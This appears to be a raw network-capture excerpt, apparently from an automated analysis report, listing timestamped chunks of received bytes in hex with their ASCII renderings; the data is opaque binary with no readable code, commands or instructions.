                                                                                                                                                2022-09-29 12:51:44 UTC17102INData Raw: 5a 76 cd 38 49 52 0c ef ee 4a 5f c1 8a 6e 8d c5 de 6c 57 f7 fd 41 23 41 c5 ce ec 52 21 09 95 4f 30 90 97 4c 8a 21 74 b8 5c d5 0f 0a 83 53 10 a2 0c 11 2d 26 6f 04 14 54 41 02 b1 70 a0 e1 c9 1f 95 4a f2 3d 54 5b 87 75 be bc 82 43 0a 1b c3 37 99 c0 9e e1 28 e3 eb 0a 18 d3 3a 99 43 7c 98 17 53 e7 17 37 d6 99 46 1b 8c db f2 6e 0d d0 54 6c 22 a3 76 53 21 46 31 ea ea d1 30 13 da ef 59 d8 e5 90 90 5a f8 68 fc 6f c4 fb ee d2 1e 8e b6 08 cc e6 a6 8a bd 12 2e e5 93 ac 6f 84 94 1c 54 be 0d 77 fd d5 59 cb b7 5f 1a 40 63 be e1 64 80 bd 11 61 51 f6 c3 e7 fe 6f 02 52 e3 20 cb 9a 54 76 e4 72 c8 2b fd bc d9 f1 22 29 fe f8 19 01 06 1a e6 5f e9 c4 87 cc c8 cd e4 9f b0 7f 55 18 4d bb 50 bf be 8a be bf 60 50 9b 55 4a 8b 8d 08 c9 0c 21 a7 dc d0 7c bd ad 11 9b 0a 9b 87 39 74 7a
                                                                                                                                                Data Ascii: Zv8IRJ_nlWA#AR!O0L!t\S-&oTApJ=T[uC7(:C|S7FnTl"vS!F10YZho.oTwY_@cdaQoR Tvr+")_UMP`PUJ!|9tz
                                                                                                                                                2022-09-29 12:51:44 UTC17118INData Raw: f7 e8 2c 6a 0a 49 f8 f6 e0 3e b1 f1 81 31 4b ab 66 9d 2c a3 d0 28 b3 3c 91 8d 51 87 be a5 d4 f7 e0 bf 16 c8 bc 1e 00 09 8a 99 8e 17 7f ee 50 c5 cf 41 9a 3c 8b 7f ce 76 b9 aa 38 01 18 2c ef ce 18 58 ca 0f ff e7 9e 20 49 d9 c2 97 3a 9d 86 2f 43 d6 7a bd 5d 20 bc a2 38 6a 58 b8 7a 51 06 3f 80 de 35 bf 4b 96 2c 70 2a f4 76 2b 51 70 18 9b 61 8a 9e a3 e2 b6 e8 ee f4 ce ab d3 78 af 94 82 79 dc 5e 99 94 dd 45 9c 29 44 c6 51 c6 ef 2f c3 4b 9d 99 c2 7d 57 9e 83 e7 88 c6 6d 29 43 39 39 fe 57 42 ed bc a4 f1 bc ba 21 d9 1e 20 f0 bf 21 59 cf b0 90 b0 2c db 17 6c 4e 71 66 79 b2 a2 d6 92 60 98 69 60 dc 11 79 7f 7f 74 ce c3 6f 3f f7 55 63 c7 88 9d cf 94 38 74 43 45 1d cf 8e ee 26 19 f9 fe 05 20 61 d3 3b 55 35 fa 00 68 55 cd 8b 6f ce 90 39 10 37 df 1d 60 a3 b3 26 62 a3 39
                                                                                                                                                Data Ascii: ,jI>1Kf,(<QPA<v8,X I:/Cz] 8jXzQ?5K,p*v+Qpaxy^E)DQ/K}Wm)C99WB! !Y,lNqfy`i`yto?Uc8tCE& a;U5hUo97`&b9
                                                                                                                                                2022-09-29 12:51:44 UTC17134INData Raw: f4 ca 14 f9 d1 33 eb fb 1b 50 9c 58 54 29 a0 8c 70 fe b2 40 59 ea b9 25 2b 37 bd b6 41 98 83 ad 68 ef d1 45 c0 8f 4f aa 1e fd d7 d7 6e d8 06 d9 66 2f 2a e1 d5 b5 b7 c3 94 cd 61 88 49 df e8 ff 61 ee da 3e e0 fd a8 7a 91 8b bd af d4 09 6f 28 ca 86 49 3d 79 d9 de a7 27 9a ef 22 8b e8 20 f5 f5 37 54 d3 a0 01 b3 2a 4e d9 1c 64 6b cb 7c c9 4e 49 34 15 0a ac 6d a9 50 a9 61 59 4f 59 48 30 7d 3a 75 a7 ca e9 cc 27 92 77 30 fa da 98 46 09 3b 0f d6 a8 1e aa 4e ea 41 6b b8 5a 18 d7 60 10 fb 58 03 6c 4b 24 23 f6 9d f8 f0 37 31 b0 db 37 45 47 d9 3f 6f 98 6b 56 10 12 e3 a4 03 23 90 2b 7e f1 8d 70 41 a5 d7 8b 21 70 d7 7b 6c 53 9d 34 93 ab 03 11 f8 4a b6 a0 cc d4 16 ae 4f 01 4a 86 af 56 37 20 6c 70 04 13 d1 9a 85 ea df e3 c0 ae 96 7e 7a 36 2a 79 0c 2e 13 5a d6 a7 10 23 3f
                                                                                                                                                Data Ascii: 3PXT)p@Y%+7AhEOnf/*aIa>zo(I=y'" 7T*Ndk|NI4mPaYOYH0}:u'w0F;NAkZ`XlK$#717EG?okV#+~pA!p{lS4JOJV7 lp~z6*y.Z#?
                                                                                                                                                2022-09-29 12:51:44 UTC17150INData Raw: 5f e0 ae 55 de 90 68 b4 57 6b c5 5a 25 9e 54 51 12 ed a2 82 31 8b a5 85 d0 52 e0 c6 1f 4e 2a 7e 4b 80 2a c2 ff bf e1 46 55 f0 4f cf 07 ef 72 0d 4d 2c 8d 65 ad 2c 73 8a 5e f7 81 8c aa 06 2d 64 7a ad 2e 02 ec 9f 4f 58 57 51 0e ab 79 d6 18 4a 42 ec 71 6c 85 6c 5a b8 90 d9 c6 04 7c 3c fd ac 71 ea 69 b3 2c fd b8 84 f5 e7 a3 f2 cf a6 91 fb 76 55 97 c5 b4 4d 0e 19 f0 77 47 d4 47 cc f1 44 89 aa 0f 5d 01 40 67 88 ae 28 f7 6f 4e 50 98 65 97 63 3d 7c c1 6f 9a ff fe ca 2b 21 bb cf f4 4c 11 2c ae 28 1f 5e 56 34 77 d0 5d 8d ec c6 84 dc 47 0f 23 95 08 99 de 83 06 1b 13 ae 3e ac bb 67 72 66 6d 8e 03 86 f3 2d ea 7d ad ec 46 e3 92 82 22 67 4b 3b d9 8e cd 34 4c bd 70 f3 f1 d8 25 5b 37 66 be 50 6d 12 07 20 0d fa 87 1b 24 02 4f ef 54 25 77 23 96 fd de 5f 56 82 b0 75 b9 53 a0
                                                                                                                                                Data Ascii: _UhWkZ%TQ1RN*~K*FUOrM,e,s^-dz.OXWQyJBqllZ|<qi,vUMwGGD]@g(oNPec=|o+!L,(^V4w]G#>grfm-}F"gK;4Lp%[7fPm $OT%w#_VuS
                                                                                                                                                2022-09-29 12:51:44 UTC17166INData Raw: e3 d2 e5 c6 a1 46 6f 27 be 09 0b c1 00 0f 49 36 b5 49 9b f7 2b a5 0d 26 75 4d 7b 79 3a b5 c6 a3 bf a8 79 06 d4 84 d2 4b bf 18 35 d5 2c ac 36 d9 08 49 33 e8 4e 49 37 3e 55 31 76 b9 83 26 2d c6 8e ea b8 92 56 a2 89 b1 cf e4 b1 d1 8a f0 2c dd 0d 6e 51 ab f1 d5 2d b5 99 67 76 06 36 56 47 49 73 b9 b3 c0 37 c2 0d 34 58 6d a6 47 23 55 2d 3f 46 0d 8b b6 2a e5 96 c8 ce 93 af bf ab 13 df 0d 93 6f 66 2b 05 b0 e4 ef af 5f 52 03 c5 35 fc a0 95 51 8b 5d e2 8d 02 cd f7 22 d0 53 20 c7 41 25 47 cd 4a 0c e9 af b5 7c c3 85 9e 78 cf ec dd af 45 5d 30 73 0c 6b cb 9b 63 7e 6e e8 a2 05 3f 52 9c 90 ba 21 99 7a f6 59 90 3d e7 b0 cc d5 bb 14 40 15 9f 7d fa 02 b5 e1 33 26 db bc e0 32 20 39 43 6e ec 70 7f 2a 5c 6e 23 7d bd 06 1d ba ab cd 6d 61 7c 62 e7 a7 60 18 29 14 c7 34 e4 f5 6b
                                                                                                                                                Data Ascii: Fo'I6I+&uM{y:yK5,6I3NI7>U1v&-V,nQ-gv6VGIs74XmG#U-?F*of+_R5Q]"S A%GJ|xE]0skc~n?R!zY=@}3&2 9Cnp*\n#}ma|b`)4k
                                                                                                                                                2022-09-29 12:51:44 UTC17182INData Raw: 9b 89 56 c9 92 6e 3b 8d 26 47 2d 55 1e 2c 37 fe 25 4f 89 4b e2 8b b1 d4 cb a5 31 0b e0 a0 53 31 d5 cc bc 70 aa 75 14 fb 5d cd 85 40 d2 42 b1 5d 61 d8 4c 8f 9c 93 a1 47 16 37 37 42 34 af bd 7a 78 4b a9 73 b9 b0 ab 1c f8 bf de 8e 23 af c3 3f 8e ab 26 30 f1 5a 13 e0 07 84 4d e7 1b dc 75 4d ea 8b 0f 1b 8c 5c b2 a3 ef 57 40 45 7c 1b 58 db 0b 59 bb 33 86 92 56 bb 4a 6b ec c4 49 56 bf 7f 39 0f fb e0 d9 b6 fe 8d 87 cd 73 69 ae dc 39 95 8c 71 43 56 df 03 b7 a4 88 bb ea 70 72 4f fd db eb 93 01 3f e2 91 4c 8e 33 b8 80 4b 74 c4 e2 3a fc c3 d2 b1 5d 6a b7 3d 45 f9 34 ec a1 79 d6 ab b7 e0 fd cf eb df 80 35 1b 63 4c ef 59 5c a1 86 60 78 e5 b3 96 8f 18 76 26 23 5e f0 b2 07 38 cf ea 12 65 c7 10 ec 96 ab 87 15 ec c2 fe e5 d4 09 f3 9b 4a 26 23 dd 2b a0 ea e1 f7 78 34 2b cd
                                                                                                                                                Data Ascii: Vn;&G-U,7%OK1S1pu]@B]aLG77B4zxKs#?&0ZMuM\W@E|XY3VJkIV9si9qCVprO?L3Kt:]j=E4y5cLY\`xv&#^8eJ&#+x4+
                                                                                                                                                2022-09-29 12:51:44 UTC17198INData Raw: fa 6b a2 5f 6a dd 48 5f d4 ec 83 60 a8 06 14 2e 25 67 ac 36 b9 98 45 df 3a 57 e6 62 c8 1b 33 d4 b4 a0 eb 68 3e ba a6 88 f4 d9 75 bb 87 39 d5 35 b5 b3 3f 84 5e 94 22 18 d9 90 ac f6 75 a9 23 1c cf f4 31 d9 62 7e 8c 1d f0 c0 cc 17 7e 02 1c 9d 0b d8 88 40 d1 34 d1 8e dd fe 8e ae 3c 1e ac de 3d 53 a3 47 84 19 0b 53 61 7a 8a 5e 54 83 28 85 03 07 4c d9 c5 5a a9 75 8c 84 c0 bc c9 23 c5 d0 6b 98 d1 4a 16 a5 ab 9a 54 9d de a6 92 dc 3a d8 f3 a7 d6 3d 6d d2 b5 45 43 c2 5e 4f bb e5 c5 c8 25 ce 67 5a c1 d4 f0 2c fc 7f 7f e1 8d 47 65 bc c7 60 c1 65 12 12 5e 0c 24 19 15 ba d1 e1 fa 8d 2c f6 69 b0 fa d8 34 71 1b 2c 60 f9 88 cc 9b 78 96 95 d5 6b 39 12 24 84 2b 63 13 90 25 e8 41 c6 76 9c a5 5d cf 95 23 c5 ee 40 59 31 b0 7b c4 14 22 94 b9 9a 9e 28 ae 29 e0 48 fb da c3 dc 74
                                                                                                                                                Data Ascii: k_jH_`.%g6E:Wb3h>u95?^"u#1b~~@4<=SGSaz^T(LZu#kJT:=mEC^O%gZ,Ge`e^$,i4q,`xk9$+c%Av]#@Y1{"()Ht
                                                                                                                                                2022-09-29 12:51:44 UTC17214INData Raw: ad 73 c8 06 32 9e 40 77 6d e7 e1 2a bd 73 ef 42 37 15 f6 4c 7e 63 61 89 a7 78 0b 40 05 98 36 14 e7 5f 79 88 81 e7 a3 31 d7 5c e2 f2 f5 28 77 df 7f e8 36 e4 7e f5 1e 3f 54 dd 9d 34 bf 30 47 77 ae 15 cb d9 37 18 d8 bc 6e e1 8f 02 59 70 4e aa 8e 63 25 2a e9 35 f6 8b 7f b1 2f d2 15 34 90 ce ee e8 3d ea b5 59 3d 5e d7 24 c0 ee de 6e fb b4 b2 7c e4 d2 8c 33 55 d0 a6 78 7f 06 e8 77 a0 39 f7 33 16 e4 38 ec 38 97 69 06 2e a5 9b 4d df a0 35 6b 69 0d 84 bc ed 04 c9 c1 5e e0 08 48 0c 6f c1 46 f4 58 62 c8 c9 46 37 74 62 a9 f6 4a b1 1a a6 0e 73 be 11 24 56 06 33 b3 a0 56 fd c0 2c 2d 68 9e 20 d4 5a ff 0c b2 0e 05 50 4d 83 7d 7c 06 e6 b1 e4 f1 cc e1 bd 1f 22 df 2e 62 b2 7a 6d 0c 39 af 56 9d 41 a7 2c 0b ce b2 0a 1d 27 40 ba f4 76 9f 43 7f 12 ec 72 fd 40 93 e6 3f 44 3f 24
                                                                                                                                                Data Ascii: s2@wm*sB7L~cax@6_y1\(w6~?T40Gw7nYpNc%*5/4=Y=^$n|3Uxw9388i.M5ki^HoFXbF7tbJs$V3V,-h ZPM}|".bzm9VA,'@vCr@?D?$
                                                                                                                                                2022-09-29 12:51:44 UTC17230INData Raw: d6 4b 80 00 29 de 75 77 bf 1f 1d 59 e3 81 86 0e ba ea e2 0d 91 2f 06 6e 5d ae 08 39 42 87 75 95 69 1b 82 29 8d 7a 4d 82 52 14 7e 22 6e 8e e1 6f ee be 70 a6 09 85 ca a8 be 70 fa 9c 3e 87 c4 95 e8 1e b9 f9 39 7e 4e 4d 3c 6a 95 90 11 15 9f dd 16 99 93 66 55 36 87 ce b0 7e 83 c9 82 5c 67 e9 2b a7 70 b9 35 62 ae 19 57 34 e5 b4 b0 47 0c fc f7 d0 e9 47 dd 88 ed 2c 92 8c 4c 3d 3c 38 92 73 b1 0b 89 f6 aa c1 f6 81 41 d4 62 ee 93 77 37 05 f8 dd 5e d0 bb 20 29 d9 7d bc ec 82 56 0a cc c5 cc f3 2b 4f 2f e0 6e 15 81 03 e0 38 c6 be fc 16 95 ac ff b9 66 4b 35 ad c4 6a ee 5e b5 10 c0 50 5d 68 7d 93 e9 7d 33 d8 a3 fb 45 88 93 e7 f9 6c 4e cd 80 87 62 16 ce 1a bc a1 ad 94 4d 3f d7 e3 61 8d d9 9e c8 64 68 37 bc 59 a5 a5 82 1c 59 20 13 16 22 63 28 28 45 1f ff 7f b6 71 69 fe 1f
                                                                                                                                                Data Ascii: K)uwY/n]9Bui)zMR~"nopp>9~NM<jfU6~\g+p5bW4GG,L=<8sAbw7^ )}V+O/n8fK5j^P]h}}3ElNbM?adh7YY "c((Eqi
                                                                                                                                                2022-09-29 12:51:44 UTC17246INData Raw: aa 85 4b 92 15 4d bf d6 ca 35 17 f1 1e b1 02 54 72 14 3d a7 36 07 34 01 fe 80 a4 05 30 55 ac ee 1c dd 04 d5 bb f1 f7 83 ff b9 e4 ec 34 5f 36 f5 df ac ae 78 f0 08 06 58 22 74 f1 f9 82 90 6b de eb ff 43 75 99 99 ba 83 60 c3 52 19 9e 2f 38 7e 5a f7 f6 f0 d5 18 4a 9d fe a7 e9 c9 c1 3b 8a 36 c0 dd 3f 37 2e ee 8f 71 3a ec 90 14 ce 21 77 b8 32 70 56 51 87 ef fe d3 27 c0 03 50 f3 1b 63 89 b0 9a 3f ac 1a cd 09 97 f9 6d 47 0d 4d 31 1a e7 ca 6e 54 e7 50 72 9b 86 ee a8 7a 34 78 bf 6c 74 d6 50 1a 53 12 3f 21 2e 11 b2 44 c1 f8 b7 d9 b5 80 d3 f4 86 88 8e fd 04 80 ed 31 07 f6 4d 18 e4 13 03 4f b2 58 6c db 1b 54 67 69 e2 c9 61 d7 9b 53 ee bc 90 e7 f5 64 ed e8 3c 08 ea f7 8a c4 b6 0a 07 fc 23 69 df d9 ea ce 7b c5 47 65 85 5d 18 5e ae 17 88 af c9 fd cd ba 87 98 65 ca 35 dc
                                                                                                                                                Data Ascii: KM5Tr=640U4_6xX"tkCu`R/8~ZJ;6?7.q:!w2pVQ'Pc?mGM1nTPrz4xltPS?!.D1MOXlTgiaSd<#i{Ge]^e5
                                                                                                                                                2022-09-29 12:51:44 UTC17262INData Raw: 2d c5 b7 aa 5f 5f 51 d2 a8 d5 5f 62 b7 cb 3b 6c 3f f7 51 4b b7 24 41 0c 7d c1 d5 6e 19 1c 44 ad 0e 4d a7 0a e5 4b 2f c9 49 b0 96 71 31 f4 d4 68 38 75 e9 45 ed 84 f2 2d a3 0f 90 9e 2e e2 3a c6 30 23 29 e8 16 68 ae 54 f5 3a 30 15 99 e6 ce f0 d2 24 c9 e6 8f d3 03 53 bb e1 94 ce dc 7d 8f 25 e1 ce 1d 79 b8 ed a1 9f b8 6c 91 09 67 d6 7a 36 fa e6 8d c0 c2 d3 7a 3f 68 fe a8 9f 03 be cf fa 02 64 0f 17 65 ea f4 ff 45 90 5a 6d 13 70 71 02 1c 91 1b 6d 93 2a b6 25 33 ce 06 81 73 42 17 17 6a 39 a5 cd eb 68 d3 14 0a f3 07 9d 38 fe 3e 87 66 d8 27 3b e7 ea 96 61 02 86 17 83 fd 42 8c 83 1e af 95 28 92 d0 58 fd c5 97 44 62 15 2e 60 f5 0d 1b 8f ca 9a af 97 26 5a ca 46 4d a4 13 ce 78 fa d6 4b 50 c7 06 54 56 ce 9c bc b7 68 01 33 36 fd 1c 44 b9 ed 51 fb 40 e8 32 2b 96 f4 0c 04
                                                                                                                                                Data Ascii: -__Q_b;l?QK$A}nDMK/Iq1h8uE-.:0#)hT:0$S}%ylgz6z?hdeEZmpqm*%3sBj9h8>f';aB(XDb.`&ZFMxKPTVh36DQ@2+
                                                                                                                                                2022-09-29 12:51:44 UTC17278INData Raw: 2c 1a dc 77 fb 51 63 57 e1 73 7b b0 19 e6 8c 62 db 1f f5 fd 7b 12 bf 70 c4 72 1e e9 de e0 7f 0c 21 de 9e f1 f2 01 9a 29 61 24 a6 80 f6 62 c8 cc be 00 e1 f2 2f 0c cc 72 97 84 9c a2 36 ee 26 5d 45 8a 51 9c 1c a9 a8 73 0d 94 bb dd bf 80 33 bb c2 2b f7 c5 48 ad 94 03 be b0 c6 00 45 32 7e 57 2c c8 dc e5 35 fc 8b 3a 7f 7e c0 65 6d 35 8d f2 0d b9 0a bd cb 95 61 e0 90 37 8e 06 28 fd 7b 01 06 8c 8d a3 57 7a 7a 84 df a0 a2 5f 50 d2 91 79 ff a8 97 b8 36 cd 6a d1 17 f5 96 e8 81 49 c2 c7 47 e8 64 a6 05 c3 dd 20 d1 b6 70 e7 68 d0 db f3 70 23 32 54 d7 70 c3 f6 73 94 95 1d 87 84 94 cd 6f 7a c9 01 23 3b 2c 35 d9 e0 6a 08 c5 a2 64 13 f0 60 ac 10 2d 39 18 98 b6 27 8a 68 c8 1f 76 51 fc a1 35 23 2d 73 fc 15 a7 32 4d 17 b6 ff 39 b4 be f1 9d 00 ea e9 f0 d9 c7 50 ef 5a e5 d4 58
                                                                                                                                                Data Ascii: ,wQcWs{b{pr!)a$b/r6&]EQs3+HE2~W,5:~em5a7({Wzz_Py6jIGd php#2Tpsoz#;,5jd`-9'hvQ5#-s2M9PZX
                                                                                                                                                2022-09-29 12:51:44 UTC17294INData Raw: c1 3d 79 40 b2 e2 e4 52 b1 fa b2 7d 04 1b dd db 7c 9a c6 8b c3 24 1b 07 10 c5 51 9d 1a 34 b9 ee 5a a7 34 73 ed 92 55 90 0c af 94 1c 50 93 c4 c6 d5 13 5a 56 dc 57 90 78 22 f9 0a f2 ce 5c 4b d5 48 e2 8d 70 14 fe 9c 63 f2 2e 29 99 f1 90 42 41 6a a6 bc 2b dc 0d 9a 84 c2 ea b3 39 90 0f a1 db 73 75 96 52 7b 6b 46 00 4e 36 10 92 e7 22 dd 71 20 a2 68 40 cb 44 b3 91 b3 6e ca c4 83 4a 72 59 ed e4 69 ff ec 46 00 2f fb 79 ce e4 b2 bb c5 45 31 81 39 6a 20 9b f0 b5 2f b1 86 f5 4a 0c 30 58 b3 e4 8d 7b 04 70 4d d4 b6 3a dd 3e 33 72 b9 a7 2c 5f 95 e3 3d 52 bb 9b 21 2e 52 62 f9 67 23 5e 19 37 37 8a a0 2d 23 4a b5 7e f8 f3 94 9c 81 fa 40 e4 9e db c0 df ce 6b ff c0 17 69 04 a5 d6 01 d8 3b 13 ae 95 12 97 7d d6 dc f9 f6 81 3a 94 79 12 79 a7 9b e5 18 8f 7c 50 c0 64 83 14 96 27
                                                                                                                                                Data Ascii: =y@R}|$Q4Z4sUPZVWx"\KHpc.)BAj+9suR{kFN6"q h@DnJrYiF/yE19j /J0X{pM:>3r,_=R!.Rbg#^77-#J~@ki;}:yy|Pd'
                                                                                                                                                2022-09-29 12:51:44 UTC17310INData Raw: d9 9f f5 b2 52 64 31 d6 33 7d 01 e9 53 d4 2f 8c ba af cc 31 1b ec 29 f1 cd 39 5e 0c e9 3b b9 58 a3 4b 2a ef 5b 0e 0a 4d 3f 02 5b cc 58 05 88 b8 03 bd 58 cd 13 7d 18 ac 20 22 d5 59 86 cf 8c 97 93 fd 2d 8a af d2 6f 43 97 e4 8e 51 c2 ac 18 40 15 c6 81 d1 b3 67 8e 4d e1 ca bd e9 ac 79 39 23 91 8d 3b 6b 0e f9 4e cf ed f6 2c 46 3d ef 3c 99 d3 b6 f9 46 b1 91 54 17 2d fe 88 eb 27 c7 b7 e5 96 dd 97 88 a3 d4 f4 71 e1 76 f8 8e 94 09 7a 55 e3 08 cc 76 63 37 94 b0 ae 35 f5 9c 1b f7 de 9e 8b ac c6 21 93 0e 87 1c 5e 31 ed 45 cb 35 b3 2e 7f ae c2 66 8f a7 7c cf 8e 0f 40 9a 8e 47 bf 87 1d 79 74 9f f8 26 11 18 e8 76 db b8 9a 9b 91 bb cd 95 d7 7b de dc b5 73 f7 a1 84 1b f5 dd 45 26 7c 82 85 b1 b3 8e 0a c3 8d 76 8a f6 f2 91 28 94 30 96 47 cf e8 39 4a 80 81 0d 94 2e ef 27 1a
                                                                                                                                                Data Ascii: Rd13}S/1)9^;XK*[M?[XX} "Y-oCQ@gMy9#;kN,F=<FT-'qvzUvc75!^1E5.f|@Gyt&v{sE&|v(0G9J.'
                                                                                                                                                2022-09-29 12:51:44 UTC17326INData Raw: 1a 8d 47 0d 63 58 26 74 29 9b d8 01 c7 e5 92 3a c6 37 cc a0 c9 30 0d b1 de 5d b7 22 40 fe 89 02 19 c4 70 44 3e 3f d7 8b 55 37 f9 85 be 71 93 0d 69 a4 a7 a4 b3 77 16 f1 f7 e1 80 c1 99 d4 80 c8 d0 67 15 83 e2 20 6c d7 09 61 8f 18 11 ea 67 74 9b 1c 33 76 45 09 d6 04 17 39 cc 73 53 08 0b c6 bc cb 79 71 ce d5 0c 60 51 5f 5b e7 b0 0e 0d ed fa b7 d3 52 71 27 df 27 a5 f9 5e 01 17 e5 39 3c ef 70 1b 1a 98 12 b6 2f fa d4 e9 96 6e 96 ba e9 22 0a dc 39 45 3c 59 33 57 ff 39 45 df af 48 89 f9 3f bf a8 07 20 f8 76 8a 48 cf ce 21 0b 96 82 79 6f 31 4e b1 82 f0 3c b9 6c 0b ba 75 6b 93 b6 f2 4c 5a 4b 55 c0 05 6c c1 fa cb aa 64 10 17 d9 3d 66 46 64 02 26 7c 1e de 20 00 98 28 a9 50 e1 92 84 d0 e5 57 6f 85 b5 b0 36 c7 cb 87 b1 81 b0 8f 0a 46 3c 0e 0e 1b b8 a9 8f 56 99 05 b5 ec
                                                                                                                                                Data Ascii: GcX&t):70]"@pD>?U7qiwg lagt3vE9sSyq`Q_[Rq''^9<p/n"9E<Y3W9EH? vH!yo1N<lukLZKUld=fFd&| (PWo6F<V
                                                                                                                                                2022-09-29 12:51:44 UTC17342INData Raw: b3 f9 38 9c f8 ad e4 52 67 b6 92 9f b9 58 de 04 4c 3a d4 4e a0 e0 61 aa bb b9 e7 34 0d fb cc 02 6d e7 29 d2 ae 54 1b 57 1d 08 58 7e 32 37 90 b9 b5 07 f9 30 9e 0f 43 c8 e5 15 61 b3 a0 8f e0 ad e0 63 f6 a9 ba 36 b9 1f 21 6e bd ca 29 c3 34 b0 be f1 6a f8 46 32 2b 56 f5 b5 d4 14 6d f1 b5 1a 4b 59 a1 b9 31 5d 8b a4 30 ce a3 c2 3e 43 d8 2a b2 25 0f 6b b7 56 a1 ce 6e 83 e4 7d e5 b0 4e 38 8c cd 41 e5 9d 9a b0 b6 76 ee f0 70 2f 4c d2 7d d4 bc 8f 20 08 d4 6e 32 da b3 01 81 98 1e fa de 81 7f 10 53 9a e7 d6 56 e8 53 0c 17 c5 c2 ed 9b ef dd 0a 5a cd be 57 5a 8e 10 f6 32 ab 37 ca be 0a aa 33 7a 5f 83 e6 71 75 c8 56 e9 42 35 ef 04 e3 14 0f 7b 67 3f 94 37 e5 5e 2d c2 49 5c 77 3a d2 8b 5a 0b 33 32 da 51 bf d1 f5 a0 b7 ac 9f 3e 58 51 cb d9 28 99 39 26 52 2c 7c d0 f2 6e 6a
                                                                                                                                                Data Ascii: 8RgXL:Na4m)TWX~270Cac6!n)4jF2+VmKY1]0>C*%kVn}N8Avp/L} n2SVSZWZ273z_quVB5{g?7^-I\w:Z32Q>XQ(9&R,|nj
                                                                                                                                                2022-09-29 12:51:44 UTC17358INData Raw: 2a 24 79 89 58 d0 88 2c 76 d2 c6 95 64 4a ba a8 8d 12 16 a8 9a 09 b0 25 e7 19 5a 84 15 bc b2 cc 2c a4 14 c6 a7 ce ba 23 f4 b3 96 04 22 3a f2 d9 94 60 f2 2b 05 71 6c 35 0e 9d 19 ce ff 6a 5f e7 0e 6a 93 a0 9f d5 90 a4 e3 64 56 e1 1e 9d 87 0b 97 6d 3f 33 fd ea f2 5b 0e 31 81 43 5d 96 89 d8 fb 2e f7 b9 0b ae 74 e2 d3 0c ad 6d 90 4a a0 7f b1 e8 ad a0 20 16 64 ba a4 2c e4 d3 a9 03 ba 5e c9 7a f6 00 91 c2 56 e4 12 df 25 38 ed 7e 2e 98 0d c5 74 61 e6 e1 de b2 30 b1 00 44 97 f8 6a 41 f8 0b ab 50 a7 b5 a3 7d b6 0c ac dd 6f 23 4b 1a 4a d0 56 78 f1 0a 40 11 8b 5e b0 be b9 ab 26 42 79 fe 4b ec df 9a 09 3e 08 0d da 65 e7 05 41 ae 33 82 9e 23 ea f0 d8 f4 93 94 44 dc c2 e1 81 e8 dd 84 e3 b5 dd a9 79 e6 9c 62 49 cb 0a a4 14 22 58 bf ef 34 5b eb 7d 17 80 d4 ee 25 05 f1 74
                                                                                                                                                Data Ascii: *$yX,vdJ%Z,#":`+ql5j_jdVm?3[1C].tmJ d,^zV%8~.ta0DjAP}o#KJVx@^&ByK>eA3#DybI"X4[}%t
                                                                                                                                                2022-09-29 12:51:44 UTC17374INData Raw: 62 be 69 70 14 8f 0a 57 f9 a6 a4 fd ee 89 53 43 87 a2 62 a6 6a f1 e3 ce 7a 95 ad a4 19 fd 85 60 8b 46 eb c8 de cf 2b 81 2f 88 d6 4e 90 fc b2 f8 0e c0 5e 87 16 57 e5 5e cb 41 5a 25 e1 d9 8f c4 e5 14 d7 ae c5 93 32 77 23 05 ed cd 32 d6 22 76 6a c1 05 49 b9 d7 f9 83 7d 19 38 07 b8 89 a3 3b 14 26 61 ce 50 8a e0 2e 3a ad ae 3e 2b fa ec 26 37 fc 05 42 92 7b 54 df a5 97 cc 5b 0b 41 d7 de f1 11 ce 35 aa 82 09 08 71 79 63 1f aa 96 fa bd 13 56 11 5a dd 0b 39 b5 d0 48 16 9a 8a bc f9 7e 8c 34 a5 ca a3 51 d5 8e 76 96 a9 05 75 2c 2f 8d 37 6f 99 96 db 08 4f cd 22 97 3c 33 f5 bb f3 d6 e1 7e a0 ab 8b 84 10 16 b8 70 44 b1 28 01 1d 1f 5f 34 fe b7 c9 83 e2 a2 f5 01 e1 16 be fe 73 a6 d2 f4 3d 90 87 74 4a c3 7f 5a 81 8a 2b 67 78 ab 0b 8d 55 68 6f 6a 28 05 2d 2b 06 4b ae 40 ca
                                                                                                                                                Data Ascii: bipWSCbjz`F+/N^W^AZ%2w#2"vjI}8;&aP.:>+&7B{T[A5qycVZ9H~4Qvu,/7oO"<3~pD(_4s=tJZ+gxUhoj(-+K@
                                                                                                                                                2022-09-29 12:51:44 UTC17390INData Raw: ab 4d 5c f3 b4 71 04 a1 55 7f 97 cf 7d a3 01 9b 72 52 0b e4 61 27 f1 9b 25 be 73 a2 d9 a3 50 99 ef 92 1d de 0b ff c9 eb ef 22 ba 4f 55 36 b1 74 c9 26 5c 9f 8e 12 b4 8f 08 d9 7b 85 c1 34 93 0b e7 25 67 25 8b 82 92 62 e1 d9 ce 31 6c 1d 88 62 ed d8 5b a0 9c 9d b9 1e 9f 51 6f 62 cd 88 e6 de 74 61 d3 d4 52 ed 0e 3d 84 40 bf 34 9d a0 d6 08 da fd 75 e9 8b fb 8c 23 cc 33 1f bb b1 d0 92 33 06 a6 20 e9 49 7a 97 dd 1c ee 80 a0 40 d2 20 87 09 8a 7b c7 99 6c bf 14 7b 79 e6 af ed 1b 20 5b 26 5a 13 08 db 2a b6 50 4b 4a fb 64 d5 99 7d 13 8d 89 ba d3 a8 58 00 64 6c 6c 32 1c 5c 1e 47 83 f4 70 41 d5 34 d7 ad aa e2 59 ec 04 ba 7d 99 e3 7d fa 83 7a 8b 01 ab 6e 17 2b a5 cc c8 9f 1e e4 6d 17 c6 e2 0e 9c 9f ef b4 32 88 3e 23 cc 12 02 f1 fa ff 8d 18 45 a4 08 67 39 3b 81 93 f4 0d
                                                                                                                                                Data Ascii: M\qU}rRa'%sP"OU6t&\{4%g%b1lb[QobtaR=@4u#33 Iz@ {l{y [&Z*PKJd}Xdll2\GpA4Y}}zn+m2>#Eg9;
